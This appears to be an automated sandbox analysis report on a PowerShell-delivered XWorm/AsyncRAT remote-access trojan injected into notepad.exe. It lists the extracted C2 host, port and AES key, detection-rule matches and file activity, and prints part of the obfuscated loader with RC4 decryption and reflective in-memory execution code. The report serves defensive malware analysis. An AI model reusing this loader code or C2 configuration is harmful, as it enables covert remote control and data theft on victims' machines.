Click to jump to signature section
| Source: 00000003.00000002.2197193345.000002004AC31000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: Xworm {"C2 url": ["dcxwq1.duckdns.org"], "Port": "7000", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.2"} |
| Source: 3.2.notepad.exe.2004aa50000.0.raw.unpack | String decryptor: dcxwq1.duckdns.org |
| Source: 3.2.notepad.exe.2004aa50000.0.raw.unpack | String decryptor: 7000 |
| Source: 3.2.notepad.exe.2004aa50000.0.raw.unpack | String decryptor: <123456789> |
| Source: 3.2.notepad.exe.2004aa50000.0.raw.unpack | String decryptor: <Xwormmm> |
| Source: 3.2.notepad.exe.2004aa50000.0.raw.unpack | String decryptor: XWorm V5.2 |
| Source: 3.2.notepad.exe.2004aa50000.0.raw.unpack | String decryptor: USB.exe |
| Source: | Binary string: System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.2188941322.000001D1995DC000.00000004.00000020.00020000.00000000.sdmp |
| Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini | Jump to behavior |
| Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user | Jump to behavior |
| Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming | Jump to behavior |
| Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows | Jump to behavior |
| Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft | Jump to behavior |
| Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData | Jump to behavior |
| Source: Malware configuration extractor | URLs: dcxwq1.duckdns.org |
| Source: powershell.exe, 00000000.00000002.2189827388.000001D19B401000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
| Source: powershell.exe, 00000000.00000002.2189827388.000001D19B401000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68 |
| Source: 3.2.notepad.exe.2004aa50000.0.raw.unpack, XLogger.cs | .Net Code: KeyboardLayout |
| Source: 3.2.notepad.exe.2004ac3ce28.1.raw.unpack, XLogger.cs | .Net Code: KeyboardLayout |
| Source: 3.2.notepad.exe.2004aa50000.0.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen |
| Source: 3.2.notepad.exe.2004aa50000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen |
| Source: 3.2.notepad.exe.2004ac3ce28.1.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen |
| Source: 3.2.notepad.exe.2004ac3ce28.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen |
| Source: 00000003.00000002.2196498370.0000020048E70000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown |
| Source: 00000003.00000002.2196498370.0000020048E70000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_5c38878d Author: unknown |
| Source: 00000003.00000002.2197193345.000002004AC31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen |
| Source: 00000003.00000002.2197060802.000002004AA50000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen |
| Source: 00000000.00000002.2189651881.000001D19AF80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown |
| Source: 00000000.00000002.2189651881.000001D19AF80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_5c38878d Author: unknown |
| Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_000001D19AFCF15B | 0_2_000001D19AFCF15B |
| Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_000001D19AFCED23 | 0_2_000001D19AFCED23 |
| Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_000001D19AFCF5E3 | 0_2_000001D19AFCF5E3 |
| Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_000001D19AFCDCDB | 0_2_000001D19AFCDCDB |
| Source: C:\Windows\System32\notepad.exe | Code function: 3_2_0000020048E7BB23 | 3_2_0000020048E7BB23 |
| Source: C:\Windows\System32\notepad.exe | Code function: 3_2_0000020048E7B703 | 3_2_0000020048E7B703 |
| Source: C:\Windows\System32\notepad.exe | Code function: 3_2_0000020048E7C3E3 | 3_2_0000020048E7C3E3 |
| Source: C:\Windows\System32\notepad.exe | Code function: 3_2_0000020048E7AADB | 3_2_0000020048E7AADB |
| Source: C:\Windows\System32\notepad.exe | Code function: 3_2_0000020048E7BF5B | 3_2_0000020048E7BF5B |
| Source: 3.2.notepad.exe.2004aa50000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT |
| Source: 3.2.notepad.exe.2004aa50000.0.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT |
| Source: 3.2.notepad.exe.2004ac3ce28.1.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT |
| Source: 3.2.notepad.exe.2004ac3ce28.1.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT |
| Source: 00000003.00000002.2196498370.0000020048E70000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13 |
| Source: 00000003.00000002.2196498370.0000020048E70000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_5c38878d os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 3b55ec6c37891880b53633b936d10f94d2b806db1723875e4ac95f8a34d97150, id = 5c38878d-ca94-4fd9-a36e-1ae5fe713ca2, last_modified = 2021-01-13 |
| Source: 00000003.00000002.2197193345.000002004AC31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT |
| Source: 00000003.00000002.2197060802.000002004AA50000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT |
| Source: 00000000.00000002.2189651881.000001D19AF80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13 |
| Source: 00000000.00000002.2189651881.000001D19AF80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_5c38878d os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 3b55ec6c37891880b53633b936d10f94d2b806db1723875e4ac95f8a34d97150, id = 5c38878d-ca94-4fd9-a36e-1ae5fe713ca2, last_modified = 2021-01-13 |
| Source: 3.2.notepad.exe.2004aa50000.0.raw.unpack, Helper.cs | Cryptographic APIs: 'TransformFinalBlock' |
| Source: 3.2.notepad.exe.2004aa50000.0.raw.unpack, Helper.cs | Cryptographic APIs: 'TransformFinalBlock' |
| Source: 3.2.notepad.exe.2004aa50000.0.raw.unpack, AlgorithmAES.cs | Cryptographic APIs: 'TransformFinalBlock' |
| Source: 3.2.notepad.exe.2004ac3ce28.1.raw.unpack, Helper.cs | Cryptographic APIs: 'TransformFinalBlock' |
| Source: 3.2.notepad.exe.2004ac3ce28.1.raw.unpack, Helper.cs | Cryptographic APIs: 'TransformFinalBlock' |
| Source: 3.2.notepad.exe.2004ac3ce28.1.raw.unpack, AlgorithmAES.cs | Cryptographic APIs: 'TransformFinalBlock' |
| Source: 3.2.notepad.exe.2004aa50000.0.raw.unpack, ClientSocket.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole) |
| Source: 3.2.notepad.exe.2004aa50000.0.raw.unpack, ClientSocket.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent() |
| Source: 3.2.notepad.exe.2004ac3ce28.1.raw.unpack, ClientSocket.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole) |
| Source: 3.2.notepad.exe.2004ac3ce28.1.raw.unpack, ClientSocket.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent() |
| Source: classification engine | Classification label: mal100.troj.spyw.evad.winPS1@4/10@0/0 |
| Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache | Jump to behavior |
| Source: C:\Windows\System32\notepad.exe | Mutant created: NULL |
| Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7376:120:WilError_03 |
| Source: C:\Windows\System32\notepad.exe | Mutant created: \Sessions\1\BaseNamedObjects\KuxjcUwK7YR0UBzc |
| Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bcscsxma.uxp.ps1 | Jump to behavior |
| Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress))).ReadToEnd();Set-StrictMode -Version 2$DoIt = @'function Crypt { param ( [byte[]]$key, [byte[]]$data ) $s = 0..255 $j = 0 for ($i = 0; $i -lt 256; $i++) { $j = ($j + $s[$i] + $key[$i % $key.Length]) % 256 $s[$i], $s[$j] = $s[$j], $s[$i] } $i = $j = 0 $output = [byte[]]::new($data.Length) for ($count = 0; $count -lt $data.Length; $count++) { $i = ($i + 1) % 256 $j = ($j + $s[$i]) % 256 $s[$i], $s[$j] = $s[$j], $s[$i] $k = $s[($s[$i] + $s[$j]) % 256] $output[$count] = $data[$count] -bxor $k } $output}function func_get_proc_address{Param($var_module, $var_procedure)$var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')$var_gpa = $var_unsafe_native_methods.GetMethod('GetProcAddress',[Type[]] @('System.Runtime.InteropServices.HandleRef', 'string'))return $var_gpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($var_unsafe_native_methods.GetMethod('GetModuleHandle')).Invoke($null, @($var_module)))), $var_procedure))}function func_get_delegate_type{Param([Parameter(Position = 0, Mandatory = $True)][Type[]] $var_parameters,[Parameter(Position = 1)][Type] $var_return_type = [Void])$var_type_builder = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')),[System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass',[System.MulticastDelegate])$var_type_builder.DefineConstructor('RTSpecialName, HideBySig, Public',[System.Reflection.CallingConventions]::Standard, $var_parameters).SetImplementationFlags('Runtime, Managed')$var_type_builder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $var_return_type, $var_parameters).SetImplementationFlags('Runtime, Managed')return $var_type_builder.CreateType()}[Byte[]]$encryptedData = [System.Convert]::FromBase64String('sRDR+2mCw0yZlQbyBCkjIjsVRdsEMKq4yMe84kee14+A+qYVv6ZN4bQQjv4MhuAr1C50rmpBiQYzi8HV2KcFl7Vz/7fGo8hdtxjo8TcSDfkqHe1ydBHC6v2UFRiQsBx0BrIa8EYHmlTWoCJY8FXVHu9N7TAseOZlZ0SnUCxEY/xyfDuzNImXGyDwaahjMv60bmoMXku48WlqOUv9Yaj |
Edit tour
powershell.exe (PID: 7360 cmdline: 
conhost.exe (PID: 7376 cmdline: 
notepad.exe (PID: 7612 cmdline: 
